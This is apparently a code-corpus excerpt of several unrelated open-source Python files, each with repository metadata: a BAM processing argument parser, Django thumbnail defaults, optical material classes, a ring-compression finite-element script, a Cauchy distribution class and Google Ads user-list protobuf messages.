elif opt == '--a': analysisType.append(arg) ### options are: all, junction, exon, reference
elif opt == '--m': ### Run each BAM file on a different processor
if arg == 'yes': useMultiProcessing=True
elif arg == 'True': useMultiProcessing=True
else: useMultiProcessing=False
else:
print "Warning! Command-line argument: %s not recognized. Exiting..." % opt; sys.exit()
if len(analysisType) == 0 or 'all' in analysisType:
analysisType = ['exon','junction','reference']
try:
refExonCoordinateFile = refExonCoordinateFile
outputExonCoordinateRefBEDfile = outputExonCoordinateRefBEDfile
except Exception:
print 'Please provide an exon coordinate text file using the option --g and an output coordinate file path (--r) to generate exon.bed files'
analysisType = ['junction']
refExonCoordinateFile = ''
outputExonCoordinateRefBEDfile = ''
try: bam_dir = bam_dir
except Exception: print 'You must specify a directory of BAM files or a single bam file with --i';sys.exit()
try: refExonCoordinateFile = refExonCoordinateFile
except Exception: print 'You must specify a AltAnalyze exon coordinate text file with --g';sys.exit()
try: outputExonCoordinateRefBEDfile = outputExonCoordinateRefBEDfile
except Exception: print 'You must specify an output path for the exon.bed reference file location with --r (e.g., --r /users/Hs_exon.bed)';sys.exit()
parallelBAMProcessing(bam_dir,refExonCoordinateFile,outputExonCoordinateRefBEDfile,analysisType=analysisType,useMultiProcessing=useMultiProcessing,MLP=mlp)
|
nsalomonis/AltAnalyze
|
import_scripts/multiBAMtoBED.py
|
Python
|
apache-2.0
| 19,538
|
[
"pysam"
] |
5449b8e1f11c67316c6ed291ef6083744d5e622f8679005fb0d7259ce8836c18
|
from django.conf import settings
# When True ThumbnailNode.render can raise errors
THUMBNAIL_DEBUG = False
# Backend
THUMBNAIL_BACKEND = 'sorl.thumbnail.base.ThumbnailBackend'
# Key-value store, ships with:
# sorl.thumbnail.kvstores.cached_db_kvstore.KVStore
# sorl.thumbnail.kvstores.redis_kvstore.KVStore
# Redis requires some more work, see docs
THUMBNAIL_KVSTORE = 'sorl.thumbnail.kvstores.cached_db_kvstore.KVStore'
# Change this to something else for MSSQL
THUMBNAIL_KEY_DBCOLUMN = 'key'
# Engine, ships with:
# sorl.thumbnail.engines.convert_engine.Engine
# sorl.thumbnail.engines.pil_engine.Engine
# sorl.thumbnail.engines.pgmagick_engine.Engine
# convert is preferred but requires imagemagick or graphicsmagick, see docs
THUMBNAIL_ENGINE = 'sorl.thumbnail.engines.pil_engine.Engine'
# Path to Imagemagick or Graphicsmagick ``convert`` and ``identify``.
THUMBNAIL_CONVERT = 'convert'
THUMBNAIL_IDENTIFY = 'identify'
# Storage for the generated thumbnails
THUMBNAIL_STORAGE = settings.DEFAULT_FILE_STORAGE
# Redis settings
THUMBNAIL_REDIS_DB = 0
THUMBNAIL_REDIS_PASSWORD = ''
THUMBNAIL_REDIS_HOST = 'localhost'
THUMBNAIL_REDIS_PORT = 6379
THUMBNAIL_REDIS_UNIX_SOCKET_PATH = None
# DBM settings
THUMBNAIL_DBM_FILE = "thumbnail_kvstore"
THUMBNAIL_DBM_MODE = 0o644
# Cache timeout for ``cached_db`` store. You should probably keep this at
# maximum or ``0`` if your caching backend can handle that as infinite.
THUMBNAIL_CACHE_TIMEOUT = 3600 * 24 * 365 * 10 # 10 years
# The cache configuration to use for storing thumbnail data
THUMBNAIL_CACHE = 'default'
# Key prefix used by the key value store
THUMBNAIL_KEY_PREFIX = 'sorl-thumbnail'
# Thumbnail filename prefix
THUMBNAIL_PREFIX = 'cache/'
# Image format, common formats are: JPEG, PNG
# Make sure the backend can handle the format you specify
THUMBNAIL_FORMAT = 'JPEG'
THUMBNAIL_PRESERVE_FORMAT = False
# Colorspace, backends are required to implement: RGB, GRAY
# Setting this to None will keep the original colorspace.
THUMBNAIL_COLORSPACE = 'RGB'
# Should we upscale images by default
THUMBNAIL_UPSCALE = True
# Quality, 0-100
THUMBNAIL_QUALITY = 95
# Gaussian blur radius
THUMBNAIL_BLUR = 0
# Adds padding around the image to match the requested size without cropping
THUMBNAIL_PADDING = False
THUMBNAIL_PADDING_COLOR = '#ffffff'
# Save as progressive when saving as jpeg
THUMBNAIL_PROGRESSIVE = True
# Orientate the thumbnail with respect to source EXIF orientation tag
THUMBNAIL_ORIENTATION = True
# This means sorl.thumbnail will generate and serve a generated dummy image
# regardless of the thumbnail source content
THUMBNAIL_DUMMY = False
# Thumbnail dummy (placeholder) source. Some you might try are:
# http://placekitten.com/%(width)s/%(height)s
# http://placekitten.com/g/%(width)s/%(height)s
# http://placehold.it/%(width)sx%(height)s
THUMBNAIL_DUMMY_SOURCE = 'http://dummyimage.com/%(width)sx%(height)s'
# Sets the source image ratio for dummy generation of images with only width
# or height given
THUMBNAIL_DUMMY_RATIO = 1.5
# Enables creation of multiple-resolution (aka "Retina") images.
# We don't create retina images by default to optimize performance.
THUMBNAIL_ALTERNATIVE_RESOLUTIONS = []
# Lazy fill empty thumbnail like THUMBNAIL_DUMMY
THUMBNAIL_LAZY_FILL_EMPTY = False
# Timeout, in seconds, to use when retrieving images with urllib2
THUMBNAIL_URL_TIMEOUT = None
# Default width when using filters for texts
THUMBNAIL_FILTER_WIDTH = 500
# Should we flatten images by default (fixes a lot of transparency issues with
# imagemagick)
THUMBNAIL_FLATTEN = False
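# A minimal sketch of how these defaults are meant to be consumed: any of the
# module-level names above can be overridden from a project's own Django
# settings module, e.g.
#
#   THUMBNAIL_ENGINE = 'sorl.thumbnail.engines.convert_engine.Engine'
#   THUMBNAIL_FORMAT = 'PNG'
#   THUMBNAIL_QUALITY = 85
#
# The values shown are illustrative, not recommendations.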
|
seedinvest/sorl-thumbnail
|
sorl/thumbnail/conf/defaults.py
|
Python
|
bsd-3-clause
| 3,576
|
[
"Gaussian"
] |
ad92315694e0ad97a0ce1edba1315d29124b0b475beaa01827f27459d1f2a9bd
|
# pylint: disable=W0622,R0903,R0902,R0913,W0633
"""Functions and objects to manipulate materials.
A material is an object with a refractive index function.
"""
from builtins import str
from builtins import object
from functools import partial
import numpy
from scipy.integrate import quad
from EMpy.constants import eps0
__author__ = 'Lorenzo Bolla'
class Material(object):
"""Generic class to handle materials.
This class is intended to be subclassed to obtain isotropic and
anisotropic materials.
"""
def __init__(self, name=''):
"""Set material name."""
self.name = name
class RefractiveIndex(object):
"""Refractive Index.
Unaware of temperature.
Parameters
----------
Provide ONE of the following named-arguments:
n0_const : float
A single-value of refractive index, to be used regardless of
the wavelength requested.
For example:
>>> n0_const = 1.448  # e.g. SiO2
n0_poly : list/tuple
Use a polynomial rix dispersion function: provide the
polynomial coefficients to be evaluated by numpy.polyval.
For example:
>>> n0_poly = (9,5,3,1)
# sets the refractive index function to n = 9*wl**3 + 5*wl**2 + 3*wl + 1
n0_smcoeffs (Sellmeier coefficients): 6-element list/tuple
Set the rix dispersion function to the 6-parameter Sellmeier
function as so:
n(wls) = sqrt(1. +
B1 * wls ** 2 / (wls ** 2 - C1) +
B2 * wls ** 2 / (wls ** 2 - C2) +
B3 * wls ** 2 / (wls ** 2 - C3))
For example:
>>> n0_smcoeffs = [B1, B2, B3, C1, C2, C3] # six values total
n0_func : function
Provide an arbitrary function to return the refractive index
versus wavelength.
For example:
>>> def SiN_func(wl):
>>> x = wl * 1e6 # convert to microns
>>> return 1.887 + 0.01929/x**2 + 1.6662e-4/x**4 # Cauchy func
>>> SiN_rix = RefractiveIndex(n0_func=SiN_func)
or
>>> SiN_rix = RefractiveIndex(
n0_func=lambda wl: 1.887 + 0.01929/(wl*1e6)**2 +
1.6662e-4/(wl*1e6)**4)
Your function should return a `numpy.array`, since it will be
passed a `numpy.array` of the wavelengths requested. This
conversion to `array` happens automatically if your function
does math on the wavelength.
n0_known : dictionary
Use if RefractiveIndex will only be evaluated at a specific set of `wls`.
n0_known should be a dictionary of `key:value` pairs
corresponding to `wavelength:rix`, for example:
>>> n0_known = { 1500e-9:1.445, 1550e-9:1.446, 1600e-9:1.447 }
"""
def __init__(self, n0_const=None, n0_poly=None, n0_smcoeffs=None,
n0_known=None, n0_func=None):
if n0_const is not None:
self.get_rix = partial(self.__from_const, n0_const)
elif n0_poly is not None:
self.get_rix = partial(self.__from_poly, n0_poly)
elif n0_smcoeffs is not None:
self.get_rix = partial(self.__from_sellmeier, n0_smcoeffs)
elif n0_func is not None:
self.get_rix = partial(self.__from_function, n0_func)
elif n0_known is not None:
self.get_rix = partial(self.__from_known, n0_known)
else:
raise ValueError('Please provide at least one parameter.')
@staticmethod
def __from_const(n0, wls):
wls = numpy.atleast_1d(wls)
return n0 * numpy.ones_like(wls)
@staticmethod
def __from_poly(n0_poly, wls):
wls = numpy.atleast_1d(wls)
return numpy.polyval(n0_poly, wls) * numpy.ones_like(wls)
@staticmethod
def __from_sellmeier(n0_smcoeffs, wls):
wls = numpy.atleast_1d(wls)
B1, B2, B3, C1, C2, C3 = n0_smcoeffs
return numpy.sqrt(
1. +
B1 * wls ** 2 / (wls ** 2 - C1) +
B2 * wls ** 2 / (wls ** 2 - C2) +
B3 * wls ** 2 / (wls ** 2 - C3)
) * numpy.ones_like(wls)
@staticmethod
def __from_function(n0_func, wls):
# ensure wls is array
wls = numpy.atleast_1d(wls)
return n0_func(wls) * numpy.ones_like(wls)
@staticmethod
def __from_known(n0_known, wls):
wls = numpy.atleast_1d(wls)
# Note: we should interpolate...
return numpy.array([n0_known.get(wl, 0) for wl in wls])
def __call__(self, wls):
return self.get_rix(wls)
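# A minimal sketch, not called anywhere in this module: build the SiN index
# from the Cauchy function quoted in the docstring above and evaluate it at
# 1550 nm. The coefficients are the illustrative ones from that docstring.
def _example_refractive_index_eval():
    SiN_rix = RefractiveIndex(
        n0_func=lambda wl: 1.887 + 0.01929 / (wl * 1e6) ** 2 +
        1.6662e-4 / (wl * 1e6) ** 4)
    return SiN_rix(numpy.array([1.55e-6]))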
class ThermalOpticCoefficient(object):
"""Thermal Optic Coefficient."""
def __init__(self, data=None, T0=300):
self.__data = data
self.T0 = T0
def TOC(self, T):
if self.__data is not None:
return numpy.polyval(self.__data, T)
else:
return 0.0
def __call__(self, T):
return self.TOC(T)
def dnT(self, T):
"""Integrate the TOC to get the rix variation."""
return quad(self.TOC, self.T0, T)[0]
class IsotropicMaterial(Material):
"""Subclasses Material to describe isotropic materials.
Frequency dispersion and thermic aware.
In all the member functions, wls must be an ndarray.
"""
def __init__(self, name='', n0=RefractiveIndex(n0_const=1.),
toc=ThermalOpticCoefficient()):
"""Set name, default temperature, refractive index and TOC
(thermal optic coefficient)."""
Material.__init__(self, name)
self.n0 = n0
self.toc = toc
def n(self, wls, T=None):
"""Return the refractive index at T as a [1 x wls] array."""
if T is None:
T = self.toc.T0
return self.n0(wls) + self.toc.dnT(T)
def epsilon(self, wls, T=None):
"""Return the epsilon at T as a [1 x wls] array."""
if T is None:
T = self.toc.T0
return self.n(wls, T) ** 2 * eps0
def epsilonTensor(self, wls, T=None):
"""Return the epsilon at T as a [3 x 3 x wls] array."""
if T is None:
T = self.toc.T0
tmp = numpy.eye(3)
return tmp[:, :, numpy.newaxis] * self.epsilon(wls, T)
@staticmethod
def isIsotropic():
"""Return True, because the material is isotropic."""
return True
def __str__(self):
"""Return material name."""
return self.name + ', isotropic'
class EpsilonTensor(object):
def __init__(self, epsilon_tensor_const=eps0 * numpy.eye(3),
epsilon_tensor_known=None):
if epsilon_tensor_known is None:
epsilon_tensor_known = {}
self.epsilon_tensor_const = epsilon_tensor_const
self.epsilon_tensor_known = epsilon_tensor_known
def __call__(self, wls):
"""Return the epsilon tensor as a [3 x 3 x wls.size] matrix."""
wls = numpy.atleast_1d(wls)
if wls.size == 1:
if wls.item() in self.epsilon_tensor_known:
return self.epsilon_tensor_known[
wls.item()][:, :, numpy.newaxis]
return self.epsilon_tensor_const[
:, :, numpy.newaxis] * numpy.ones_like(wls)
class AnisotropicMaterial(Material):
"""Subclass Material to describe anisotropic materials.
No frequency dispersion nor thermic aware.
In all the member functions, wls must be an ndarray.
"""
def __init__(self, name='', epsilon_tensor=EpsilonTensor()):
"""Set name and default epsilon tensor."""
Material.__init__(self, name)
self.epsilonTensor = epsilon_tensor
@staticmethod
def isIsotropic():
"""Return False, because the material is anisotropic."""
return False
def __str__(self):
"""Return material name."""
return self.name + ', anisotropic'
# Vacuum
Vacuum = IsotropicMaterial(name='Vacuum')
# Air
Air = IsotropicMaterial(name='Air')
# Silicon
Si = IsotropicMaterial(
name='Silicon',
n0=RefractiveIndex(
n0_poly=(0.076006e12, -0.31547e6, 3.783)),
toc=ThermalOpticCoefficient((-1.49e-10, 3.47e-7, 9.48e-5)))
# SiO2
SiO2 = IsotropicMaterial(
name='Silica',
n0=RefractiveIndex(n0_const=1.446),
toc=ThermalOpticCoefficient((1.1e-4,)))
# BK7 glass (see http://en.wikipedia.org/wiki/Sellmeier_equation)
BK7 = IsotropicMaterial(
name='Borosilicate crown glass',
n0=RefractiveIndex(n0_smcoeffs=(
1.03961212, 2.31792344e-1, 1.01046945, 6.00069867e-15, 2.00179144e-14,
1.03560653e-10)))
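# A minimal sketch, not called anywhere in this module: evaluate the materials
# defined above. The wavelength and temperature values are illustrative only.
def _example_isotropic_material_usage():
    wls = numpy.array([1.55e-6])
    n_sio2 = SiO2.n(wls)              # index at the default temperature T0
    eps_si = Si.epsilon(wls, T=320.)  # permittivity of silicon at 320 K
    return n_sio2, eps_si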
class LiquidCrystal(Material):
"""Liquid Crystal.
A liquid crystal is determined by its ordinary and extraordinary
refractive indices, its elastic tensor and its chirality.
Inspiration here:
U{http://www.ee.ucl.ac.uk/~rjames/modelling/constant-order/oned/}.
@ivar name: Liquid Crystal name.
@ivar nO: Ordinary refractive index.
@ivar nE: Extraordinary refractive index.
@ivar K11: Elastic tensor, first component.
@ivar K22: Elastic tensor, second component.
@ivar K33: Elastic tensor, third component.
@ivar q0: Chirality.
"""
def __init__(self, name='', nO=1., nE=1., nO_electrical=1.,
nE_electrical=1., K11=0.0, K22=0.0, K33=0.0, q0=0.0):
"""Set name, the refractive indices, the elastic constants and
the chirality."""
Material.__init__(self, name)
self.nO = nO
self.nE = nE
self.nO_electrical = nO_electrical
self.nE_electrical = nE_electrical
self.K11 = K11
self.K22 = K22
self.K33 = K33
self.q0 = q0
self.epslow = self.nO_electrical ** 2
self.deleps = self.nE_electrical ** 2 - self.epslow
def get_10400_000_100(conc000):
"""Return a LiquidCrystal made of conc% 000 and (100-conc)% 100."""
conc = [0, 100]
epsO_electrical = [3.38, 3.28]
epsE_electrical = [5.567, 5.867]
epsO = [1.47551 ** 2, 1.46922 ** 2]
epsE = [1.61300 ** 2, 1.57016 ** 2]
K11 = 13.5e-12 # elastic constant [N] (splay)
K22 = 6.5e-12 # elastic constant [N] (twist)
K33 = 20e-12 # elastic constant [N] (bend)
q0 = 0 # chirality 2*pi/pitch
nO_electrical_ = numpy.interp(conc000, conc, epsO_electrical) ** .5
nE_electrical_ = numpy.interp(conc000, conc, epsE_electrical) ** .5
nO_ = numpy.interp(conc000, conc, epsO) ** .5
nE_ = numpy.interp(conc000, conc, epsE) ** .5
return LiquidCrystal(
'10400_000_100_' + str(conc000) + '_' + str(100 - conc000),
nO_, nE_, nO_electrical_, nE_electrical_,
K11, K22, K33, q0)
|
DanHickstein/EMpy
|
EMpy/materials.py
|
Python
|
mit
| 10,629
|
[
"CRYSTAL"
] |
8bbbfcf8b6162e877b55b4089438c628fd8e30aeef6b7da6951fdb247eb66762
|
from compmod.models import RingCompression
from abapy import materials
from abapy.misc import load
from abapy.postproc import FieldOutput
import matplotlib.pyplot as plt
import numpy as np
import pickle, copy
import platform
from scipy import interpolate
#PARAMETERS
is_3D = True
inner_radius, outer_radius = 30 , 40
Nt, Nr, Na = 10, 5, 2
Ne = Nt * Nr * Na
displacement = 5.
nFrames = 100
Nseed = 400 # Number of grain seeds
sigma_0_hp = .001
k_hp = .001
nu = 0.3
n = 0.001
E = 1.
thickness =10.
workdir = "workdir/"
label = "ringCompression_voronoi"
elType = "C3D8"
cpus = 1
node = platform.node()
if node == 'lcharleux': abqlauncher = '/opt/Abaqus/6.9/Commands/abaqus' # Ludovic
if node == 'serv2-ms-symme': abqlauncher = '/opt/abaqus/Commands/abaqus' # Linux
if node == 'epua-pd47':
abqlauncher = 'C:/SIMULIA/Abaqus/6.11-2/exec/abq6112.exe' # Local machine configuration
if node == 'SERV3-MS-SYMME':
abqlauncher = '"C:/Program Files (x86)/SIMULIA/Abaqus/6.11-2/exec/abq6112.exe"' # Local machine configuration
if node == 'epua-pd45':
abqlauncher = 'C:\SIMULIA/Abaqus/Commands/abaqus'
#TASKS
Run_simu = True
#MODEL DEFINITION
disp = displacement/2.
model = RingCompression(
inner_radius = inner_radius,
outer_radius = outer_radius,
disp = disp,
thickness = thickness,
nFrames = nFrames,
Nr = Nr,
Nt = Nt,
Na = Na,
workdir = workdir,
label = label,
elType = elType,
abqlauncher = abqlauncher,
cpus = cpus,
is_3D = is_3D,
compart = True)
# SIMULATION
model.MakeMesh()
mesh = model.mesh
centroids = mesh.centroids()
nodes = mesh.nodes
nodes_position = np.array([nodes.x, nodes.y, nodes.z]).transpose()
conn = np.array(mesh.connectivity)
labels = nodes.labels
# VORONOI CELL BUILDING
# Bounding box
xmin, xmax = nodes_position[:,0].min(), nodes_position[:,0].max()
ymin, ymax = nodes_position[:,1].min(), nodes_position[:,1].max()
zmin, zmax = nodes_position[:,2].min(), nodes_position[:,2].max()
# Seeds
seeds = np.random.rand(Nseed,3) * np.array([[xmax - xmin, ymax -ymin, zmax - zmin]]) + np.array([[xmin, ymin, zmin]])
seed_flags = np.arange(Nseed)
elem_flags = interpolate.griddata(seeds, seed_flags, centroids, method = "nearest")
# Volumes and dimensions
elem_volume = mesh.volume()
grain_volume = np.zeros(len(seed_flags))
for i in xrange(len(seed_flags)):
flag = seed_flags[i]
grain_volume[i] = ((elem_flags == flag) * elem_volume).sum()
grain_diameter = (grain_volume * 6./np.pi)**(1. / 3.)
elem_grain_diameter = grain_diameter[elem_flags]
# Hall-Petch (not mandatory)
sy = sigma_0_hp + k_hp / elem_grain_diameter**.5
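# (Illustrative note: the line above is a Hall-Petch type relation, sy = sigma_0 + k / sqrt(d),
# so smaller grain diameters d give a higher local yield stress; sigma_0_hp and k_hp are the
# parameters defined at the top of this script.)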
E = E * np.ones(Ne) # Young's modulus
nu = nu * np.ones(Ne) # Poisson's ratio
n = n * np.ones(Ne)
labels = ['mat_{0}'.format(i+1) for i in xrange(len(sy))]
material = [materials.Bilinear(labels = labels[i],E = E[i], nu = nu[i], n = n[i],sy = sy[i]) for i in xrange(Ne)]
model.material = material
sy_field = FieldOutput(labels = mesh.labels, data = sy, position = "element")
if Run_simu:
model.MakeInp()
model.Run()
model.MakePostProc()
model.RunPostProc()
else:
model.LoadResults()
# Plotting results
if model.outputs['completed']:
U = model.outputs['field']['U'][0]
mesh.nodes.apply_displacement(U)
f = open(label + ".vtk", "w")
f.write(mesh.dump2vtk())
f.write(sy_field.dump2vtk(name = "Yield_Stress"))
f.write( model.outputs['field']['S'][0].vonmises().dump2vtk(name = "Von_Mises_Stress"))
f.close()
# History Outputs
force = -2. * model.outputs['history']['force']
disp = -2. * model.outputs['history']['disp']
fig = plt.figure(0)
plt.clf()
sp1 = fig.add_subplot(1, 1, 1)
plt.plot(disp.data[0], force.data[0], 'ro-', label = 'Loading', linewidth = 2.)
plt.plot(disp.data[1], force.data[1], 'bv-', label = 'Unloading', linewidth = 2.)
plt.legend(loc="upper left")
plt.xlabel('Displacement, $U$')
plt.ylabel('Force, $F$')
plt.grid()
plt.savefig(workdir + label + 'history.pdf')
|
lcharleux/compmod
|
doc/sandbox/laurent/ring_compression_voronoi.py
|
Python
|
gpl-2.0
| 3,955
|
[
"VTK"
] |
458cdccec0e8ead58e791a92932d9229ef542946f99a321c6ee149022e656fc1
|
"""The Cauchy distribution."""
from equadratures.distributions.template import Distribution
from equadratures.distributions.recurrence_utils import custom_recurrence_coefficients
import numpy as np
from scipy.stats import cauchy
RECURRENCE_PDF_SAMPLES = 8000
class Cauchy(Distribution):
"""
The class defines a Cauchy object. It is the child of Distribution.
:param double location:
Location parameter of the Cauchy distribution.
:param double scale:
Scale parameter of the Cauchy distribution.
"""
def __init__(self, location=None, scale=None):
self.location = location
self.scale = scale
self.bounds = np.array([-np.inf, np.inf])
self.skewness = np.nan
self.kurtosis = np.nan
if self.scale is not None:
self.x_range_for_pdf = np.linspace(-15*self.scale, 15*self.scale, RECURRENCE_PDF_SAMPLES)
self.parent = cauchy(loc=self.location, scale=self.scale)
self.mean = np.mean(self.get_samples(m=1000))
self.variance = np.var(self.get_samples(m=1000))
def get_description(self):
"""
A description of the Cauchy distribution.
:param Cauchy self:
An instance of the Cauchy class.
:return:
A string describing the Cauchy distribution.
"""
text = "is a Cauchy distribution that by definition has an undefined mean and variance; its location parameter is "+str(self.location)+", and its scale parameter is "+str(self.scale)+"."
return text
def get_pdf(self, points=None):
"""
A Cauchy probability density function.
:param Cauchy self:
An instance of the Cauchy class.
:param array points:
Array of points for defining the probability density function.
:return:
An array of N values over the support of the distribution.
:return:
Probability density values along the support of the Cauchy distribution.
"""
if points is not None:
return self.parent.pdf(points)
else:
raise ValueError('Please provide an input for the get_pdf method.')
def get_cdf(self, points=None):
"""
A Cauchy cumulative density function.
:param Cauchy self:
An instance of the Cauchy class.
:param array points:
Array of points for defining the cumulative density function.
:return:
An array of N equidistant values over the support of the distribution.
:return:
Cumulative density values along the support of the Cauchy distribution.
"""
if points is not None:
return self.parent.cdf(points)
else:
raise ValueError('Please provide an input for the get_cdf method.')
def get_icdf(self, xx):
"""
An inverse Cauchy cumulative density function.
:param Cauchy self:
An instance of the Cauchy class.
:param array xx:
A numpy array of uniformly distributed samples between [0, 1].
:return:
Inverse CDF samples associated with the Cauchy distribution.
"""
return self.parent.ppf(xx)
def get_samples(self, m):
"""
Generates samples from the Cauchy distribution.
:param Cauchy self:
An instance of the Cauchy class.
:param integer m:
Number of random samples. If no value is provided, a default of 5e5 is assumed.
:return:
A N-by-1 vector that contains the samples.
"""
if m is not None:
number = m
else:
number = 500000
return self.parent.rvs(size=number)
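# Illustrative usage sketch (not part of the original module); the parameter values
# below are arbitrary and only exercise the class defined above.
if __name__ == "__main__":
    dist = Cauchy(location=0.0, scale=1.0)
    print(dist.get_description())
    u = np.linspace(0.01, 0.99, 5)
    print(dist.get_icdf(u))                # inverse CDF samples
    print(dist.get_pdf(np.array([0.0])))   # density at the location parameter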
|
psesh/Effective-Quadratures
|
equadratures/distributions/cauchy.py
|
Python
|
mit
| 3,749
|
[
"Gaussian"
] |
f9231f292d54b10b2c1d15fed83182d1caa172191172ff4cec56982073b958be
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v9.enums.types import customer_match_upload_key_type
from google.ads.googleads.v9.enums.types import user_list_combined_rule_operator
from google.ads.googleads.v9.enums.types import user_list_crm_data_source_type
from google.ads.googleads.v9.enums.types import (
user_list_date_rule_item_operator,
)
from google.ads.googleads.v9.enums.types import user_list_logical_rule_operator
from google.ads.googleads.v9.enums.types import (
user_list_number_rule_item_operator,
)
from google.ads.googleads.v9.enums.types import user_list_prepopulation_status
from google.ads.googleads.v9.enums.types import user_list_rule_type
from google.ads.googleads.v9.enums.types import (
user_list_string_rule_item_operator,
)
__protobuf__ = proto.module(
package="google.ads.googleads.v9.common",
marshal="google.ads.googleads.v9",
manifest={
"SimilarUserListInfo",
"CrmBasedUserListInfo",
"UserListRuleInfo",
"UserListRuleItemGroupInfo",
"UserListRuleItemInfo",
"UserListDateRuleItemInfo",
"UserListNumberRuleItemInfo",
"UserListStringRuleItemInfo",
"CombinedRuleUserListInfo",
"DateSpecificRuleUserListInfo",
"ExpressionRuleUserListInfo",
"RuleBasedUserListInfo",
"LogicalUserListInfo",
"UserListLogicalRuleInfo",
"LogicalUserListOperandInfo",
"BasicUserListInfo",
"UserListActionInfo",
},
)
class SimilarUserListInfo(proto.Message):
r"""SimilarUserList is a list of users which are similar to users
from another UserList. These lists are read-only and
automatically created by Google.
Attributes:
seed_user_list (str):
Seed UserList from which this list is
derived.
This field is a member of `oneof`_ ``_seed_user_list``.
"""
seed_user_list = proto.Field(proto.STRING, number=2, optional=True,)
class CrmBasedUserListInfo(proto.Message):
r"""UserList of CRM users provided by the advertiser.
Attributes:
app_id (str):
A string that uniquely identifies a mobile
application from which the data was collected.
For iOS, the ID string is the 9 digit string
that appears at the end of an App Store URL
(e.g., "476943146" for "Flood-It! 2" whose App
Store link is
http://itunes.apple.com/us/app/flood-
it!-2/id476943146). For Android, the ID string
is the application's package name (e.g.,
"com.labpixies.colordrips" for "Color Drips"
given Google Play link
https://play.google.com/store/apps/details?id=com.labpixies.colordrips).
Required when creating CrmBasedUserList for
uploading mobile advertising IDs.
This field is a member of `oneof`_ ``_app_id``.
upload_key_type (google.ads.googleads.v9.enums.types.CustomerMatchUploadKeyTypeEnum.CustomerMatchUploadKeyType):
Matching key type of the list.
Mixed data types are not allowed on the same
list. This field is required for an ADD
operation.
data_source_type (google.ads.googleads.v9.enums.types.UserListCrmDataSourceTypeEnum.UserListCrmDataSourceType):
Data source of the list. Default value is FIRST_PARTY. Only
customers on the allow-list can create third-party sourced
CRM lists.
"""
app_id = proto.Field(proto.STRING, number=4, optional=True,)
upload_key_type = proto.Field(
proto.ENUM,
number=2,
enum=customer_match_upload_key_type.CustomerMatchUploadKeyTypeEnum.CustomerMatchUploadKeyType,
)
data_source_type = proto.Field(
proto.ENUM,
number=3,
enum=user_list_crm_data_source_type.UserListCrmDataSourceTypeEnum.UserListCrmDataSourceType,
)
class UserListRuleInfo(proto.Message):
r"""A client defined rule based on custom parameters sent by web
sites or uploaded by the advertiser.
Attributes:
rule_type (google.ads.googleads.v9.enums.types.UserListRuleTypeEnum.UserListRuleType):
Rule type is used to determine how to group
rule items.
The default is OR of ANDs (disjunctive normal
form). That is, rule items will be ANDed
together within rule item groups and the groups
themselves will be ORed together.
Currently AND of ORs (conjunctive normal form)
is only supported for ExpressionRuleUserList.
rule_item_groups (Sequence[google.ads.googleads.v9.common.types.UserListRuleItemGroupInfo]):
List of rule item groups that defines this rule. Rule item
groups are grouped together based on rule_type.
"""
rule_type = proto.Field(
proto.ENUM,
number=1,
enum=user_list_rule_type.UserListRuleTypeEnum.UserListRuleType,
)
rule_item_groups = proto.RepeatedField(
proto.MESSAGE, number=2, message="UserListRuleItemGroupInfo",
)
class UserListRuleItemGroupInfo(proto.Message):
r"""A group of rule items.
Attributes:
rule_items (Sequence[google.ads.googleads.v9.common.types.UserListRuleItemInfo]):
Rule items that will be grouped together based on rule_type.
"""
rule_items = proto.RepeatedField(
proto.MESSAGE, number=1, message="UserListRuleItemInfo",
)
class UserListRuleItemInfo(proto.Message):
r"""An atomic rule item.
This message has `oneof`_ fields (mutually exclusive fields).
For each oneof, at most one member field can be set at the same time.
Setting any member of the oneof automatically clears all other
members.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
name (str):
Rule variable name. It should match the corresponding key
name fired by the pixel. A name must begin with US-ascii
letters or underscore or UTF8 code that is greater than 127
and consist of US-ascii letters or digits or underscore or
UTF8 code that is greater than 127. For websites, there are
two built-in variable URL (name = 'url__') and referrer URL
(name = 'ref_url__'). This field must be populated when
creating a new rule item.
This field is a member of `oneof`_ ``_name``.
number_rule_item (google.ads.googleads.v9.common.types.UserListNumberRuleItemInfo):
An atomic rule item composed of a number
operation.
This field is a member of `oneof`_ ``rule_item``.
string_rule_item (google.ads.googleads.v9.common.types.UserListStringRuleItemInfo):
An atomic rule item composed of a string
operation.
This field is a member of `oneof`_ ``rule_item``.
date_rule_item (google.ads.googleads.v9.common.types.UserListDateRuleItemInfo):
An atomic rule item composed of a date
operation.
This field is a member of `oneof`_ ``rule_item``.
"""
name = proto.Field(proto.STRING, number=5, optional=True,)
number_rule_item = proto.Field(
proto.MESSAGE,
number=2,
oneof="rule_item",
message="UserListNumberRuleItemInfo",
)
string_rule_item = proto.Field(
proto.MESSAGE,
number=3,
oneof="rule_item",
message="UserListStringRuleItemInfo",
)
date_rule_item = proto.Field(
proto.MESSAGE,
number=4,
oneof="rule_item",
message="UserListDateRuleItemInfo",
)
class UserListDateRuleItemInfo(proto.Message):
r"""A rule item composed of a date operation.
Attributes:
operator (google.ads.googleads.v9.enums.types.UserListDateRuleItemOperatorEnum.UserListDateRuleItemOperator):
Date comparison operator.
This field is required and must be populated
when creating new date rule item.
value (str):
String representing date value to be compared
with the rule variable. Supported date format is
YYYY-MM-DD. Times are reported in the customer's
time zone.
This field is a member of `oneof`_ ``_value``.
offset_in_days (int):
The relative date value of the right hand
side denoted by number of days offset from now.
The value field will override this field when
both are present.
This field is a member of `oneof`_ ``_offset_in_days``.
"""
operator = proto.Field(
proto.ENUM,
number=1,
enum=user_list_date_rule_item_operator.UserListDateRuleItemOperatorEnum.UserListDateRuleItemOperator,
)
value = proto.Field(proto.STRING, number=4, optional=True,)
offset_in_days = proto.Field(proto.INT64, number=5, optional=True,)
class UserListNumberRuleItemInfo(proto.Message):
r"""A rule item composed of a number operation.
Attributes:
operator (google.ads.googleads.v9.enums.types.UserListNumberRuleItemOperatorEnum.UserListNumberRuleItemOperator):
Number comparison operator.
This field is required and must be populated
when creating a new number rule item.
value (float):
Number value to be compared with the
variable. This field is required and must be
populated when creating a new number rule item.
This field is a member of `oneof`_ ``_value``.
"""
